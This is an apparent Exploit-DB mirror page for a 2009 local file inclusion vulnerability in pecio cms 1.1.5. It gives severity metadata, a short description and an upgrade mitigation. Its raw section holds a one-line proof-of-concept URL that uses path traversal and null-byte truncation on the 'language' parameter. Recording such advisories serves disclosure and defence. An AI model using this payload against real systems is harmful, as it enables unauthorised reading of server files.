header-logo
Suggest Exploit
vendor:
pecio cms
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: pecio cms
Affected Version From: 1.1.5
Affected Version To: 1.1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability

A vulnerability in pecio cms 1.1.5 allows an attacker to include a local file via the 'language' parameter in the 'index.php' script. An attacker can exploit this vulnerability to include arbitrary files from local resources which can lead to the disclosure of sensitive information.

Mitigation:

Upgrade to the latest version of pecio cms.
Source

Exploit-DB raw data:

#######################################################################################################
[+] pecio cms 1.1.5 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
#######################################################################################################

[+] Local File Inclusion

   PoC :

     http://127.0.0.1/[path]/install/index.php?step=2&language=../../../../../../../BOOTSECT.BAK%00

########################################################################################################

# milw0rm.com [2009-05-01]

Navigation

Suggest Exploit

Services By CQR